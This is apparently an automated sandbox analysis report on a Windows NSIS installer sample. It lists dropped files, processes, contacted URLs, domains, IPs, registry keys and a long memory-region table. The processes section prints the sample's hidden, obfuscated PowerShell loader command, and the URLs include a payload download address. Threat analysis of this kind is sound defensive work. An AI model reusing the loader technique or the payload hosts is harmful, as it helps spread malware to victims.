Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
24100311.EXE.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi
|
ASCII text, with very long lines (3293), with CRLF, LF line terminators
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Glued.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Goffers.Bra
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\byrge.txt
|
ASCII text, with very long lines (422), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\fremfaerden.bla
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\selvstndighedstrang.bil
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\tidsskriftartiklerne.hyp
|
Matlab v4 mat-file (little endian) $, numeric, rows 0, columns 180
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\Cloud Setting.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gg4ex4s.tfc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt1tlivq.jor.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlg1o2kf.4wn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubv4uql0.hgn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nseDBF3.tmp
|
data
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\24100311.EXE.exe
|
"C:\Users\user\Desktop\24100311.EXE.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.corella.ro/D5
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin
|
109.73.128.91
|
||
|
https://www.corella.ro/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binA
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binKokisUrawww.creditesimplebm.ro/tmp-image/
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://ftp.rusticpensiune.ro
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://aka.ms/pscore6lBtq
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 7 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ftp.rusticpensiune.ro
|
185.146.87.128
|
|
|
|
corella.ro
|
109.73.128.91
|
||
|
www.corella.ro
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.146.87.128
|
ftp.rusticpensiune.ro
|
Romania
|
|
|
|
109.73.128.91
|
corella.ro
|
Spain
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\smrers\Rovfisk55
|
Unsobering
|
||
|
HKEY_CURRENT_USER\subtilly\Codicillary\Diipenates
|
Dolt
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
21FB1000
|
trusted library allocation
|
page read and write
|
|
|
|
A206000
|
direct allocation
|
page execute and read and write
|
|
|
|
21FF7000
|
trusted library allocation
|
page read and write
|
|
|
|
23019000
|
trusted library allocation
|
page read and write
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
trusted library allocation
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
219D0000
|
heap
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
71A0000
|
heap
|
page read and write
|
||
|
2426C000
|
stack
|
page read and write
|
||
|
5C83000
|
trusted library allocation
|
page read and write
|
||
|
24163000
|
heap
|
page read and write
|
||
|
24560000
|
trusted library allocation
|
page read and write
|
||
|
3A40000
|
remote allocation
|
page execute and read and write
|
||
|
2E28000
|
heap
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
244E0000
|
trusted library allocation
|
page read and write
|
||
|
240F6000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
73EE000
|
stack
|
page read and write
|
||
|
241C8000
|
heap
|
page read and write
|
||
|
24580000
|
trusted library allocation
|
page read and write
|
||
|
B3D000
|
heap
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
6C10000
|
direct allocation
|
page read and write
|
||
|
754000
|
heap
|
page read and write
|
||
|
837B000
|
trusted library allocation
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
C10000
|
trusted library allocation
|
page read and write
|
||
|
21BA0000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
451000
|
unkown
|
page read and write
|
||
|
4BA6000
|
trusted library allocation
|
page read and write
|
||
|
7F550000
|
trusted library allocation
|
page execute and read and write
|
||
|
5C01000
|
trusted library allocation
|
page read and write
|
||
|
7202000
|
heap
|
page read and write
|
||
|
422000
|
unkown
|
page read and write
|
||
|
24530000
|
trusted library allocation
|
page execute and read and write
|
||
|
24580000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
24500000
|
trusted library allocation
|
page read and write
|
||
|
71DC000
|
heap
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
2350000
|
heap
|
page read and write
|
||
|
21E50000
|
direct allocation
|
page read and write
|
||
|
8090000
|
trusted library allocation
|
page read and write
|
||
|
4A5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2461E000
|
stack
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
5C8000
|
heap
|
page read and write
|
||
|
21610000
|
direct allocation
|
page read and write
|
||
|
21BEE000
|
stack
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
AD0000
|
trusted library section
|
page read and write
|
||
|
6D90000
|
direct allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
242C0000
|
heap
|
page execute and read and write
|
||
|
6BF0000
|
direct allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24EB0000
|
trusted library allocation
|
page read and write
|
||
|
B03000
|
trusted library allocation
|
page execute and read and write
|
||
|
21ED9000
|
stack
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
240E2000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
244E0000
|
trusted library allocation
|
page read and write
|
||
|
2455E000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
B04000
|
trusted library allocation
|
page read and write
|
||
|
B99000
|
heap
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
84D0000
|
trusted library allocation
|
page read and write
|
||
|
23FB8000
|
trusted library allocation
|
page read and write
|
||
|
2418A000
|
heap
|
page read and write
|
||
|
244E0000
|
trusted library allocation
|
page read and write
|
||
|
21DA0000
|
remote allocation
|
page read and write
|
||
|
2413F000
|
heap
|
page read and write
|
||
|
766000
|
heap
|
page read and write
|
||
|
BFB000
|
heap
|
page read and write
|
||
|
9DE000
|
stack
|
page read and write
|
||
|
240EE000
|
trusted library allocation
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
5ABC000
|
trusted library allocation
|
page read and write
|
||
|
83E000
|
stack
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
7F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
71B9000
|
heap
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
21670000
|
direct allocation
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
492000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
21DA0000
|
remote allocation
|
page read and write
|
||
|
66A0000
|
direct allocation
|
page read and write
|
||
|
6F3E000
|
stack
|
page read and write
|
||
|
24171000
|
heap
|
page read and write
|
||
|
24E70000
|
trusted library allocation
|
page read and write
|
||
|
6BD0000
|
direct allocation
|
page read and write
|
||
|
24514000
|
trusted library allocation
|
page read and write
|
||
|
347D000
|
stack
|
page read and write
|
||
|
7FAD000
|
stack
|
page read and write
|
||
|
73AE000
|
stack
|
page read and write
|
||
|
44D6000
|
remote allocation
|
page execute and read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
240D6000
|
trusted library allocation
|
page read and write
|
||
|
2D77000
|
heap
|
page read and write
|
||
|
42F000
|
unkown
|
page read and write
|
||
|
24550000
|
trusted library allocation
|
page read and write
|
||
|
607000
|
heap
|
page read and write
|
||
|
82F7000
|
heap
|
page read and write
|
||
|
333F000
|
stack
|
page read and write
|
||
|
21F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
24102000
|
trusted library allocation
|
page read and write
|
||
|
5A51000
|
trusted library allocation
|
page read and write
|
||
|
2CA0000
|
trusted library allocation
|
page read and write
|
||
|
24500000
|
trusted library allocation
|
page read and write
|
||
|
2CA2000
|
trusted library allocation
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
240FD000
|
trusted library allocation
|
page read and write
|
||
|
71B2000
|
heap
|
page read and write
|
||
|
245A0000
|
trusted library allocation
|
page read and write
|
||
|
21E9A000
|
stack
|
page read and write
|
||
|
6C20000
|
direct allocation
|
page read and write
|
||
|
24120000
|
trusted library allocation
|
page read and write
|
||
|
2CD0000
|
heap
|
page readonly
|
||
|
8160000
|
heap
|
page read and write
|
||
|
21E1F000
|
stack
|
page read and write
|
||
|
21D4E000
|
stack
|
page read and write
|
||
|
27A9000
|
heap
|
page read and write
|
||
|
C2A000
|
trusted library allocation
|
page execute and read and write
|
||
|
82B5000
|
heap
|
page read and write
|
||
|
22015000
|
trusted library allocation
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
6B60000
|
direct allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
716000
|
heap
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
4AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
244F2000
|
trusted library allocation
|
page read and write
|
||
|
24E70000
|
trusted library allocation
|
page read and write
|
||
|
AF0000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
66C0000
|
direct allocation
|
page read and write
|
||
|
245B0000
|
trusted library allocation
|
page read and write
|
||
|
4A0D000
|
stack
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
70B2000
|
heap
|
page read and write
|
||
|
22005000
|
trusted library allocation
|
page read and write
|
||
|
48D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24E90000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
818E000
|
heap
|
page read and write
|
||
|
4A40000
|
heap
|
page execute and read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
7232000
|
heap
|
page read and write
|
||
|
5214000
|
trusted library allocation
|
page read and write
|
||
|
60B000
|
heap
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
21F5F000
|
stack
|
page read and write
|
||
|
21AAE000
|
stack
|
page read and write
|
||
|
24513000
|
trusted library allocation
|
page read and write
|
||
|
21640000
|
direct allocation
|
page read and write
|
||
|
21B2D000
|
stack
|
page read and write
|
||
|
B49000
|
heap
|
page read and write
|
||
|
5019000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
B0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
72A0000
|
heap
|
page execute and read and write
|
||
|
801E000
|
stack
|
page read and write
|
||
|
838000
|
stack
|
page read and write
|
||
|
7218000
|
heap
|
page read and write
|
||
|
ACE000
|
stack
|
page read and write
|
||
|
22FD9000
|
trusted library allocation
|
page read and write
|
||
|
241CE000
|
heap
|
page read and write
|
||
|
843E000
|
stack
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
2415F000
|
heap
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
66B0000
|
direct allocation
|
page read and write
|
||
|
709000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
401000
|
unkown
|
page execute read
|
||
|
C01000
|
heap
|
page read and write
|
||
|
24530000
|
trusted library allocation
|
page read and write
|
||
|
8522000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page execute and read and write
|
||
|
24520000
|
trusted library allocation
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
24560000
|
trusted library allocation
|
page read and write
|
||
|
24570000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
607000
|
heap
|
page read and write
|
||
|
4A6000
|
unkown
|
page readonly
|
||
|
8D70000
|
direct allocation
|
page execute and read and write
|
||
|
24E70000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
603000
|
heap
|
page read and write
|
||
|
2408C000
|
stack
|
page read and write
|
||
|
498E000
|
stack
|
page read and write
|
||
|
2D3E000
|
stack
|
page read and write
|
||
|
21FA0000
|
heap
|
page read and write
|
||
|
494000
|
unkown
|
page readonly
|
||
|
27C2000
|
heap
|
page read and write
|
||
|
24590000
|
trusted library allocation
|
page read and write
|
||
|
4AB2000
|
trusted library allocation
|
page read and write
|
||
|
6DD0000
|
direct allocation
|
page read and write
|
||
|
24560000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
82FC000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
5B5000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
4A6000
|
unkown
|
page readonly
|
||
|
22FB1000
|
trusted library allocation
|
page read and write
|
||
|
427000
|
unkown
|
page read and write
|
||
|
24580000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
60B000
|
heap
|
page read and write
|
||
|
7F10000
|
heap
|
page read and write
|
||
|
490000
|
trusted library allocation
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page read and write
|
||
|
24550000
|
trusted library allocation
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
24557000
|
trusted library allocation
|
page read and write
|
||
|
4ED6000
|
remote allocation
|
page execute and read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24520000
|
trusted library allocation
|
page read and write
|
||
|
7FD0000
|
heap
|
page read and write
|
||
|
240F1000
|
trusted library allocation
|
page read and write
|
||
|
8D60000
|
direct allocation
|
page execute and read and write
|
||
|
30D0000
|
trusted library allocation
|
page read and write
|
||
|
C19000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
24520000
|
trusted library allocation
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21F80000
|
trusted library allocation
|
page read and write
|
||
|
2457D000
|
stack
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
8192000
|
heap
|
page read and write
|
||
|
7A0000
|
direct allocation
|
page read and write
|
||
|
240CE000
|
stack
|
page read and write
|
||
|
7F540000
|
trusted library allocation
|
page execute and read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
24580000
|
trusted library allocation
|
page read and write
|
||
|
2465E000
|
stack
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
9806000
|
direct allocation
|
page execute and read and write
|
||
|
2DBF000
|
stack
|
page read and write
|
||
|
8196000
|
heap
|
page read and write
|
||
|
496000
|
trusted library allocation
|
page execute and read and write
|
||
|
24550000
|
trusted library allocation
|
page read and write
|
||
|
2418A000
|
heap
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
494000
|
unkown
|
page readonly
|
||
|
626000
|
heap
|
page read and write
|
||
|
B00000
|
trusted library allocation
|
page read and write
|
||
|
232F000
|
stack
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
24520000
|
trusted library allocation
|
page read and write
|
||
|
4A51000
|
trusted library allocation
|
page read and write
|
||
|
24520000
|
trusted library allocation
|
page read and write
|
||
|
6DA0000
|
direct allocation
|
page read and write
|
||
|
605000
|
heap
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
5021000
|
trusted library allocation
|
page read and write
|
||
|
93F000
|
stack
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
240DB000
|
trusted library allocation
|
page read and write
|
||
|
24550000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
6D80000
|
direct allocation
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
830F000
|
heap
|
page read and write
|
||
|
21E40000
|
direct allocation
|
page read and write
|
||
|
B18000
|
heap
|
page read and write
|
||
|
24530000
|
trusted library allocation
|
page read and write
|
||
|
8261000
|
heap
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF000
|
stack
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
6ACE000
|
stack
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
6BC0000
|
heap
|
page execute and read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
71C2000
|
heap
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24530000
|
trusted library allocation
|
page read and write
|
||
|
7FB0000
|
heap
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
21F90000
|
heap
|
page execute and read and write
|
||
|
719000
|
heap
|
page read and write
|
||
|
8370000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24450000
|
trusted library allocation
|
page read and write
|
||
|
2354000
|
heap
|
page read and write
|
||
|
2D48000
|
trusted library allocation
|
page read and write
|
||
|
71A8000
|
heap
|
page read and write
|
||
|
B81000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page readonly
|
||
|
2CF9000
|
heap
|
page read and write
|
||
|
84B0000
|
trusted library allocation
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
49CE000
|
stack
|
page read and write
|
||
|
6DA000
|
heap
|
page read and write
|
||
|
21A6E000
|
stack
|
page read and write
|
||
|
712000
|
heap
|
page read and write
|
||
|
A8E000
|
stack
|
page read and write
|
||
|
21650000
|
direct allocation
|
page read and write
|
||
|
720F000
|
heap
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
242D1000
|
heap
|
page read and write
|
||
|
8D40000
|
heap
|
page read and write
|
||
|
2CA5000
|
trusted library allocation
|
page execute and read and write
|
||
|
242D0000
|
heap
|
page read and write
|
||
|
24580000
|
trusted library allocation
|
page read and write
|
||
|
435000
|
unkown
|
page read and write
|
||
|
241D1000
|
heap
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
71EE000
|
heap
|
page read and write
|
||
|
71EC000
|
heap
|
page read and write
|
||
|
24EA0000
|
trusted library allocation
|
page read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
494E000
|
stack
|
page read and write
|
||
|
21A2E000
|
stack
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
21630000
|
direct allocation
|
page read and write
|
||
|
7B0000
|
direct allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
8055000
|
trusted library allocation
|
page read and write
|
||
|
21C2F000
|
stack
|
page read and write
|
||
|
24550000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
21F70000
|
trusted library allocation
|
page read and write
|
||
|
4A2000
|
trusted library allocation
|
page read and write
|
||
|
21CBF000
|
stack
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
819A000
|
heap
|
page read and write
|
||
|
24511000
|
trusted library allocation
|
page read and write
|
||
|
473000
|
trusted library allocation
|
page execute and read and write
|
||
|
24110000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
24181000
|
heap
|
page read and write
|
||
|
24870000
|
trusted library allocation
|
page read and write
|
||
|
459000
|
unkown
|
page readonly
|
||
|
6FE000
|
stack
|
page read and write
|
||
|
81C0000
|
heap
|
page read and write
|
||
|
240D0000
|
trusted library allocation
|
page read and write
|
||
|
24580000
|
trusted library allocation
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
22FB9000
|
trusted library allocation
|
page read and write
|
||
|
279F000
|
stack
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
62D6000
|
remote allocation
|
page execute and read and write
|
||
|
8540000
|
trusted library allocation
|
page execute and read and write
|
||
|
21AED000
|
stack
|
page read and write
|
||
|
63D000
|
heap
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
8377000
|
trusted library allocation
|
page read and write
|
||
|
8365000
|
trusted library allocation
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
8D3C000
|
stack
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page read and write
|
||
|
A89000
|
heap
|
page read and write
|
||
|
757C000
|
stack
|
page read and write
|
||
|
5BFB000
|
trusted library allocation
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
242B0000
|
heap
|
page read and write
|
||
|
607000
|
heap
|
page read and write
|
||
|
A2E000
|
stack
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
24540000
|
trusted library allocation
|
page read and write
|
||
|
6B80000
|
direct allocation
|
page read and write
|
||
|
6A8B000
|
stack
|
page read and write
|
||
|
769000
|
heap
|
page read and write
|
||
|
24510000
|
trusted library allocation
|
page read and write
|
||
|
A20000
|
heap
|
page read and write
|
||
|
6BE0000
|
direct allocation
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
6F7E000
|
stack
|
page read and write
|
||
|
242AC000
|
stack
|
page read and write
|
||
|
21660000
|
direct allocation
|
page read and write
|
||
|
8D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
724B000
|
heap
|
page read and write
|
||
|
58D6000
|
remote allocation
|
page execute and read and write
|
||
|
24529000
|
trusted library allocation
|
page read and write
|
||
|
21620000
|
direct allocation
|
page read and write
|
||
|
24587000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
7080000
|
heap
|
page read and write
|
||
|
6B0E000
|
stack
